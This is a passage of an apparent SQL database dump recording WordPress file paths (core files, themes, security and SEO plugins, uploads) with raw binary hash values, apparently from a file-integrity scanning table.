AxT�8?�чaݯ�','',0,'?'),('fֈ�����V�Թ)�9','wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('f둤s#%<XRX�@>�','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*x�&B���!�$fW','�.�7^V�t�Y��U�@Ď�\'~(�:>�k�','',0,'?'),('g\n��[�q��g- i�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��O�߄_�D���','�`�YABO��k[���Ai�\"5\rg���','',0,'?'),('g#L�ͬK�A]ea�2','wp-content/plugins/wordpress-seo/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('g#�,vM������:��','wp-includes/js/jquery/jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�R&�l�7NHÍK','��S��f���\0�����HR�E��0�i؛sf�','',0,'?'),('g+yr���q����D��/','wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zm���f1q��˴','�nl\Z���h�1he�-�M��5�Nl��bd�Hpz�','',0,'?'),('g+���wJoG���{b','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����hU4�Sm`�\Z�S*','�WV�����Rq��1Sx��-o5x� sn��\\��','',0,'?'),('gC1N(�q;3�)h','wp-content/plugins/wp-cerber/assets/flags/ez.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('gE\n���X�F)4\0y�\'','wp-content/plugins/wp-cerber/assets/flags/gt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eQ�2�\Z>���^�','�\ndJj7ؖ�S��y�a�{���Sm�Բ','',0,'?'),('gQir��똿��/!��','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��:�}�\0��','�7�ٗBȜ�ѲG�C��En��u��l��!c��','',0,'?'),('grN8��N�SU�]g\rM�','wp-content/plugins/wordfence/js/admin.liveTraffic.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڗU�_|�$>���7','wR�u�sXq��s�a�OFvQ�y�Ł#���','',0,'?'),('gv��\ZUO��������','wp-includes/blocks/html/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jf;BʼnH���_�d|','�_��x�F僿!!͍�ݔd�^uI|�t�','',0,'?'),('gz���#�PR���t','wp-content/uploads/2019/08/thai-property-300x166.jpg',0,'N�sVUЖ����;','N�sVUЖ����;','���y����yɓ��Rr��%:\'�5R�غ�f','',0,'?'),('g|y_�o4\"��X�N���','wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('g�\Z���Ş��|q�(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R�<�nI�<','�e}]T��Y(�u&\r��90+��a�DϮ�#��','',0,'?'),('g�$G\\��;�r���1X','wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),('g�K����N>J��4','wp-includes/blocks/freeform/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�D�����e�','-�N�š>ܒٽ����j�n/�h��gS1T','',0,'?'),('g�f�1�۶�y�;�_','wp-includes/class-wp-http-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('g�s��)��m��%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`r�ll�3@ޠ!s','F+�RZς�eQ$ep�G%Ev�-�xE','',0,'?'),('g�]e��!^��(PK���','wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�T�}�HW\'<}\\','Z¥|�s�S�8e��3�Eؗ�$����ܜ-h�','',0,'?'),('g��C�������2�**','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-fi.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"&�2��Yd�C���f�','�a�O�ycD��\rHVSS��!��>�9�N�','',0,'?'),('g��~)�~�s�ʞ��I','wp-admin/includes/class-language-pack-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6d�,�����8E�','�G�y��mT�8=�?�5� �5��y�.�','',0,'?'),('g��)1ҧ�����0�','wp-content/plugins/wordpress-seo/languages/yoast-components-sv_SE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&�\r0U@1�v�m','� //0�6��G_R(��}�w�����x�+','',0,'?'),('gӁ�\"}�H��,�d�','wp-includes/blocks/social-links/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�fȈHkf�=]T\n�','�ܰ��`Ͼ�\"�F���q� ���4��T','',0,'?'),('g��]bR%� Z��E�','wp-includes/js/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('g�Ed��1��D}����','wp-includes/js/jquery/ui/autocomplete.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�s(.=����ͪ�','�a�b��u�7���K\'2��V��=y��','',0,'?'),('g��ͬ���K��� �7g','wp-content/languages/plugins/wordpress-seo-en_GB-b550fb51b97820c3766131f4aa6574dc.json',0,'�$L�2Ÿ�\"d)j','�$L�2Ÿ�\"d)j','$9�o�R<��e%�B3]R�R�]9z8o�','',0,'?'),('hi�FǷɵx��N�','wp-content/plugins/wordpress-seo/inc/language-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XY�mX[�t�\'�\\��ۧ','GE�dUw4\\�P��f6�G�����b��]�R','',0,'?'),('hZ[���=���w�r�','wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('h\ZOhl��_��Lm/�','wp-includes/class-wp-customize-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~I�`,�J)�]�&','(ل�?k��[z�s!�utm���V��f�s-','',0,'?'),('h���;B���9','wp-content/plugins/wordpress-seo/languages/yoast-components-es_PE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.P�\0p]�K�Pq��)','����@C�PZtt���()�.\n��e���]','',0,'?'),('h d��껅2��_�r','wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GQ\0���[��� �9','E�Z�H����Ruj�X{L��oy�X` Y��鈨','',0,'?'),('h,� ��#=l��Ǖ ','wp-content/plugins/redirection/models/redirect/redirect-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��zU��<�a|_*l�','&�F���nn�6�]j�� �C;{\r&䮸�hE�e','',0,'?'),('h0X-�i����^�G`8','wp-includes/pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�䌀��נּ�#���|�','�����a#�\r9�y����̸�P�f�C hE=D','',0,'?'),('h4���#3�`�-݈�\"�','wp-admin/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��,���g;ꙴ','�C��q��N,�`v�S��*���Z[�`���m�','',0,'?'),('h@Z�%�R�F�;ti\\m','wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6]\'�l�*!4���','ml�@嫿��s�`gwd,X,մf�/ᢩ!���(','',0,'?'),('hc���=� ���0�','wp-includes/block-patterns/social-links-shared-background-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����}��;`\Z�Դ��','>�**��?�-T*��H�%9�/��E�Vy�f�','',0,'?'),('hzV����z$=���','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/RedirectMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȇ��0��A���C�','���C�]āk.hssk8����-;�/9','',0,'?'),('h|hE��f:Ʊ2��~','wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹ����H^r�','�f�kL��\Z�)h/F_��M�9�j���V�','',0,'?'),('h�OT,$��(�������','wp-includes/blocks/site-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��ђ}�?IF7!�X�','}9\"ʓ���F)�����4�U�w^¹1^:���','',0,'?'),('h��~cTOo�y4|','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('h�M�V�m� ����','wp-includes/blocks/categories/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=)�`K�!2:�7','����1���\'s�1I�M���Z�����մ$iD','',0,'?'),('h�<�]���OpNCƴ�','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�{�C-���.����','5%��꒛�⁚�d�*<nԗ�ҜN�Z��z�','',0,'?'),('h��r���/�B�\'�0','wp-content/themes/twentynineteen/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�x��4�Ҫ���','d�@����d%�1M���Mo6��1����Vk','',0,'?'),('h��]n,�����m:��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� &�A�2+9\\[�','�g��C�}؞���gv���c��N��Q�py��','',0,'?'),('h�.α�D4$�Gv��lC','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'���sw~�O���','���I�D��v���j�Q߶��d;��t�\Z��¦','',0,'?'),('h�6;Ғ�c%����7','wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��߱�l�\Zp���\"�','�?�fD�\r��5ק� ��ߋ�ޙ���J�6�qm','',0,'?'),('h���QK�V<r:Mg_��','wp-includes/js/dist/format-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�Aۑo���/=ݠ�','��Y�F�L2\Z$����mEK�/8Ot��oh','',0,'?'),('i\0a�\nq��8���\Z�','wp-content/plugins/wordpress-seo/js/dist/api-client-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��P�뗤�q�9y�o','̝�ل��\"�3Q�%�H͔]\r�@v���Ҡ�','',0,'?'),('i\n�x#d��zå8�','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�K�0�b��xљ]','4����\n�c�E2=V�{�+�\\goЅ�O��','',0,'?'),('i����kmCx�ʷ��','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��.��q�:�j��R','u�a�v�R���+We\r�T�J%�\"�\r7�f���','',0,'?'),('i6oV�5��1�,n�','wp-content/plugins/wordpress-seo/src/config/migrations/20200429105310_TruncateIndexableTables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','媆�\"�LW��ǔ\\�','; ��Q;A0�шS�=�PG��<�ʔ�sڠ��','',0,'?'),('i��{��pW\r��9�/�','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-settings-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��7j�A�qz���a','�Ўh��B��w4�\r��ī �j �t -�R�','',0,'?'),('i��;�&��o�?','wp-includes/IXR/class-IXR-base64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('i(�� �0t7�@�Q�@','wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-bad-request-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$v�)W���ؔ�E��','X���_<X�Knm�_���&��K$E3S�','',0,'?'),('i3�|� JP���*�','wp-content/plugins/wordpress-seo/src/conditionals/development-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɋ3 3�G�.�7��1','y6U������t�ĒfDk�w�+т_G�naB','',0,'?'),('i4�^v�zs�n�\Z�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-difficulty-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rڦ�+`Ovh','�p_J�9��]3!\r\'?�Ja)�t1E_�������','',0,'?'),('iP�峫���^���^ܞ','wp-content/uploads/2019/12/pexels-photo.jpg',0,'�Dw�����~��S�','�Dw�����~��S�','c�8?@���ٞP�ߘ�ծTKk,�O��;�','',0,'?'),('i\\�4W��2�4��>�','wp-content/themes/twentytwentyone/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�6z\"9�\ZN�R?�;','�����I\r�ަ,�/,V�����ɩ�ӄ%','',0,'?'),('ia{�-��\Z�ؙo��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�<���s��9','��Q�\'�r�� �t7��=s*a`<�z�o�_','',0,'?'),('idܶ�1�\"���^�','wp-includes/blocks/separator/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nS���Cg%�\nn��','��ች�^wx%8�a���!\'�b�m:�n#\r��','',0,'?'),('ii�\"o�C����`','wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('itr�<\'����;�','wp-content/plugins/wp-cerber/languages/wp-cerber-vi.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0h�\0{.AS����D#�','xLn�O��A��f�\\��KM\rH�@�H����','',0,'?'),('i�X~�Ҟl�� )��','wp-content/plugins/wp-cerber/assets/fonts/cerber.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW\n�a1�m-6>���','�a��{R�Ԉ���r��ɿ��=n�5�[�:bc','',0,'?'),('i��q����xjpR��','wp-content/themes/twentytwenty/template-parts/featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�����{�κ','�F�\"�ט�VX����R�H�^�v,\"o��','',0,'?'),('i�R�@]�&\ri���','wp-content/plugins/wordpress-seo/css/dist/adminbar-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qN:�v_�-�h P','��J8vr�~��ȶ[�����\r��b��','',0,'?'),('i���\\+�\0X;�t��','wp-content/uploads/2019/06/fibre-optic-768x512.jpg',0,'~ ����ю�N�R�','~ ����ю�N�R�','k����8�����E�w��G�\'{��O','',0,'?'),('i�-��X�8V[~E�','wp-admin/css/install-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�j�$u��� ��ZX','���6[{\"��cG��o���bC�Z#Z���:','',0,'?'),('i�\\����=X�h$','wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӥ�ku��lLS�','��r4��i���j�\"܈�����6���&','',0,'?'),('i�k���C��T,�','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�h��2aE��0','�D�:�]踝z����w%[�j�o����X`�','',0,'?'),('i�Թ/��s�(?�z','wp-content/plugins/wp-cerber/assets/flags/pl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�؍�J������S�$','�-v_ꉱ�N��M+o���� �cx��D]�','',0,'?'),('i�rHFn���A\n�AS�=','wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�AO���K��o�t�','�������lN_-�\n��|\r蒝vy�$k','',0,'?'),('j�S����^p N �','wp-content/plugins/wordpress-seo/src/generators/schema-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&ER��c1��S+��6g','P}cL\"�CL\0>j.���HU&J��0������','',0,'?'),('j&�V1���6�4����','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��9 �#��{�','ᄆ��n�ѿ�0c~N��r��Au�g~Δ���I','',0,'?'),('j)\\�@ȡ5�I�O!','wp-content/uploads/2019/08/Green-Energy.jpg',0,'���ϐ�Tz��SK\\�','���ϐ�Tz��SK\\�','��eW(T�?�u��gZ��\Z\n�{��g�:','',0,'?'),('j*�\Z@�����w��','wp-content/plugins/wordpress-seo/src/helpers/date-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Є?O���[@!��','G��\0b�3Qf�:�K\"r�B�-��P�>','',0,'?'),('j.G=�K�D�u��(I�','wp-content/plugins/wordpress-seo/js/dist/settings-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��%w��z��8{�Ҕ','!���~߽.�N���LĄ���V�F<,8U�','',0,'?'),('j3]p���B���R!I�q','wp-content/plugins/wp-cerber/assets/flags/cr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v.\Zg����9V��','t~���� V�7�V���L�$D\0��p;\"�\ZX��1','',0,'?'),('j;���_�=�\Z����','wp-includes/blocks/group/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!��6SHp1h}G*\'','�틞�0x��{���I�<�ߥ�C�B[xR�d�','',0,'?'),('jQ���e���;�e','wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�d�\\n�Ue�S@','������7�Z%\0L�|��I�`��?{hl�G�\\','',0,'?'),('jmE��AX�uw�>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B1�R,:=�ȭ','�0�#��⼄��/��t)��Q�~f�\0s.B�','',0,'?'),('jt��Z��ܿ�,��','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����a�a��i','{J�L���ͻ&��{��{��T:������B','',0,'?'),('j�䱋����%���]�','wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�`\'S���̽�','�I.��B�Ad<3KE�BB���Ya��F�KR~','',0,'?'),('j�_m�EQ�,��k�','wp-content/themes/twentytwenty/template-parts/entry-author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~N��{M5�D���','R������{��X�g��ɍ�1T~���=','',0,'?'),('j����p�\0Z��','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Z�xu�t�\n��x�','��p!ŗ$�����<�#|j��f�#�-z�','',0,'?'),('j�vL8j�y���^�\r\"','wp-content/plugins/wordpress-seo/languages/wordpress-seo-id_ID.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Τ�z�-j%k\\���','�L�s�L� \0�T��N�vْ\"(*��~�œ�x�','',0,'?'),('j���)n�Q8ޮ�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�t0�,06���<��','�Q#f���9�;�8��*B�3�W�ao3Fc�','',0,'?'),('j����5F+���o','wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),('j��}R���`�6��','wp-content/themes/vega/assets/img/ico_arrow_lr_black.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@�d�q%�x؛�w','�h@1�/�\r�\\\" �\0���_�!}��K��<�','',0,'?'),('j�tl�l&H�N(�54','wp-content/themes/twentytwentyone/assets/css/ie.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=Kt�U��p=��xE�',')��؟λ�\\�Z��o t/�Y�iy��D��','',0,'?'),('j��4-�O Մ��rL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$1�D�\'w��m���','E&&\n��a���~�b+\Z���)j��M�p��M�','',0,'?'),('j�gs�66�$��8*�E�','wp-includes/class-wp-dependency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('j�����.��0cJ@','wp-content/uploads/2019/08/Case-study-150x150.jpg',0,'���X*���J�4Ah','���X*���J�4Ah','+�\r�Ɛ���~�V�&���P�=��p��i�w&','',0,'?'),('j�d�CT[^�R���','wp-includes/block-patterns/query-large-title-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�>��[�M���9�+�','}��%\Z@qt��D4� �σ ����K�','',0,'?'),('k�V:o��\0�\n��a�Q','wp-content/plugins/disable-gutenberg/languages/disable-gutenberg.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�Q(��B �հA','{,ϰzې�2l}�s�;Z�C�nc��q|�Q;y','',0,'?'),('k���$6O��-N�x�','wp-includes/js/tinymce/plugins/charmap/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=B�쟄��P\rL��','�x[�G��-�90b.z�G��az�>�r','',0,'?'),('k%�\r0̯�IN6�D\'�y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�+�ک�d�ݬ@��','w�bj�Y����S����tc��� ��I��dQ','',0,'?'),('k6���*���H� �u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�,d\\ ��Ta;�R','��7�#�}5V�\0\\��\ZO?v?����Aԍ','',0,'?'),('kE��n�fϋߟ�\'qb','wp-includes/blocks/video/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/cO��A���q��a','���xѭ�\Z�V�P��s�b�s҂�υ�l(A','',0,'?'),('kM������̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�B��ߑ��{W�1�','����T(ݥ��ЂU�u�w� 2� ��]�','',0,'?'),('k`\n>(����I��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/CurlHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Zw��r��k�^��','O%�W�Af0aQ���C\r�\n�Ʋ���','',0,'?'),('km�|��Kma0�\"*�k','wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�ͨ�p���d����','�r0�\"��l\n�E�ݴ�*�7��vL�{d','',0,'?'),('k}:����VN����G','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>P��H�e6�[GF�5�','��q!�홐��%ހP٧��H��r�.�L��~','',0,'?'),('k��1���/�͓ݐ%=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dq�d6�+\"��U���','�I����s;֮����i����k���E�@�)','',0,'?'),('k��x\"�m�x?���dO','wp-content/plugins/redirection/database/schema/216.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0e\rI�Z�1�&�#�','�@���t�3\"�%z&7!(�S#k/@��-1��R�h','',0,'?'),('k�x�r�,j��i���(','wp-content/plugins/wordpress-seo/admin/class-asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2���F�7��I','��/�\0�_��>�X�O�$\\�^v!�V��*�a','',0,'?'),('k��B˞�b=y��','wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�֗��?�Z�Z���L�','j>�%��妫�%�)%�A��\n�F�s��l�wF{','',0,'?'),('k�a�J\Z���\\D.��P','wp-content/plugins/wordpress-seo/admin/roles/class-register-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɏ3��I�!�BW�ڧ','}*0�5�-�Q�̡�p�`ˣ���rP�a','',0,'?'),('k��U/�^���� ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��֟0}_���','�O�+�WE��(\Zvl�%`���¢�x�6��n� ','',0,'?'),('kۚ�� #푥s�ePY�','wp-content/plugins/wp-cerber/assets/flags/kn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�\Z���%q�$�','�g-)�ASZ�v�Z��-<��.aءU�ن+�','',0,'?'),('k�� h�ѻ<x�j','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-null-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�|\'��0�]���','�T!K���-�+[j��je\"a���1��Lг�i','',0,'?'),('k�\'\n+&=��n`�3�','wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����t�-��t��K��?','���J��v��7�F)M\'�ѳ��췌ph�]','',0,'?'),('k�1�~�R�xOj���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gݐ3���}\'fG���','LOY�}<2��8����\Z�s�����_��N�','',0,'?'),('k�����v#�O���','wp-content/plugins/wordpress-seo/src/deprecated/admin/extensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�\'���>=jd','�C�A�*f�Ɂvn��̣\r\n���\n^��','',0,'?'),('l7�N��<߳VʦZ�','wp-content/themes/twentytwentyone/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�nu���G-t�\n�1�','��q��3#������Sr�c:w�L�','',0,'?'),('l �.�G�h��','wp-content/plugins/wordpress-seo/src/memoizers/presentation-memoizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��xxO9{H�=9�^��','}�Ӎ��YYY��F�P�_+\r�41(3�߫�B','',0,'?'),('l/\n�Ԁ�W�ͱ-c�','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�42\Z��!��p<�x�','Tb������FI���j\'!��\'�}A;W','',0,'?'),('l2���SM�/��A��','wp-content/plugins/wp-cerber/languages/wp-cerber-sr_RS.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�h\r�\"�^i]9)q','E[ٔ��o����9�.��Q�L�\"�������3','',0,'?'),('l9��=��h�,>���&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X��s?����˟�g','?`�y�R�ե��`Uʙ��Zdž�f��s��b�sO�','',0,'?'),('lN\'�#,�~Rx9j','wp-content/uploads/2019/08/young-150x150.jpg',0,'�״j�ǂa� xß�5�','�״j�ǂa� 